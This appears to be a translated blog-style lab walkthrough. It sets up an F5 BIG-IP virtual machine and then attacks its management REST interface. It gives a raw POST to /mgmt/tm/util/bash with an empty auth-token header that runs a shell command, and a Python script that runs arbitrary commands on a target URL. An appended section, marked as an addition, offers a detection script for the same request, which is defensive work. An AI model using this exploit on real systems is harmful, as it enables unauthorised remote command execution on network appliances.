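Install F5 BIG-IP; click to download (a proxy is needed to get past the firewall).

Then double-click the .ova, or import it into VirtualBox, to open the virtual machine, and set a strong password.
Hehe~ ... mine is installed. The window is tiny, probably because my screen resolution is too high, and I'm not very good at using this box either.
Enter the following in order:
root
default
default
123!@#qwe (set any strong password, otherwise it will not be accepted)

Get the IP address. Because my screen was so small, I used ifconfig|more and paged through the output line by line.

Target address: https://192.168.0.107. Try logging in with admin and the strong password you just set; on first login you are asked to change the password, so just do so.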


Payload
POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.0.107
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.0
Authorization: Basic YWRtaW46c3YzbmJlYXN0
X-F5-Auth-Token:
Content-Length: 42
Content-Type: application/json

{"utilCmdArgs": "-c id", "command": "run"}

Exp
import requests,sys,json
from requests.auth import HTTPBasicAuth
requests.packages.urllib3.disable_warnings()
banner = '''
__ _____ ______ _____ _____ ___________
/ _| ___| | ___ \_ _| __ \ |_ _| ___ \\
| |_|___ \ | |_/ / | | | | \/_____| | | |_/ /
| _| \ \ | ___ \ | | | | _|______| | | __/
| | /\__/ / | |_/ /_| |_| |_\ \ _| |_| |
|_| \____/ \____/ \___/ \____/ \___/\_|
by 斯文
'''
def exp(url,cmd):
    try:
        session = requests.Session()
        # JSON body in the same shape as the request in the Payload section
        rawBody = "{{\"utilCmdArgs\": \"-c {}\", \"command\": \"run\"}}".format(cmd)
        # X-F5-Auth-Token is sent present but empty, as in the Payload section
        headers = {"Accept":"*/*","Connection":"close","User-Agent":"python-requests/2.25.0","Accept-Encoding":"gzip, deflate","X-F5-Auth-Token":"","Content-Type":"application/json"}
        # Certificate verification is disabled (verify=False)
        response = session.post("{}/mgmt/tm/util/bash".format(url), data=rawBody,headers=headers, verify=False,auth=HTTPBasicAuth("admin","test"))
        result = json.loads(response.content)
        print(">url: {}".format(url))
        print(">command: {}".format(cmd))
        print(">result: \n\n{}".format(result['commandResult']))
    except Exception as e:
        # print(e)
        # Any error (connection failure, non-JSON reply, missing key) lands here
        print("Not vul")

if __name__ == "__main__":
    print(banner)
    exp(sys.argv[1],sys.argv[2])
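
A detection-side counterpart to the request in the Payload section, added here as an example (it is not part of the original post): it parses raw HTTP requests and flags a POST to /mgmt/tm/util/bash whose X-F5-Auth-Token header is present but empty. The function names, the "alert"/"review"/"ignore" labels and all sample requests are constructed for this example, and it assumes the requests are available as decrypted text (for instance from a TLS-terminating proxy).

```python
import json

# Constructed requests (not captured traffic). The first mirrors the Payload
# section; hostnames, the token and the Basic value are placeholders.
SAMPLES = [
    "POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: bigip.example\r\n"
    "Authorization: Basic PLACEHOLDER\r\nX-F5-Auth-Token:\r\n"
    "Content-Type: application/json\r\n\r\n"
    '{"utilCmdArgs": "-c id", "command": "run"}',
    "POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: bigip.example\r\n"
    "X-F5-Auth-Token: CONSTRUCTED-TOKEN\r\n"
    "Content-Type: application/json\r\n\r\n"
    '{"utilCmdArgs": "-c uptime", "command": "run"}',
    "GET /mgmt/tm/sys/version HTTP/1.1\r\nHost: bigip.example\r\n\r\n",
]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            # Header names are case-insensitive; keep empty values as "".
            headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0].rstrip("/"), headers, body


def classify(raw):
    """Return (verdict, utilCmdArgs) for one request."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path != "/mgmt/tm/util/bash":
        return ("ignore", None)
    try:
        doc = json.loads(body)
        args = doc.get("utilCmdArgs") if isinstance(doc, dict) else None
    except ValueError:
        args = None
    # Header present but empty, as in the request on this page.
    if headers.get("x-f5-auth-token") == "":
        return ("alert", args)
    # Any other call to the bash utility endpoint is still worth a look.
    return ("review", args)


if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample))
```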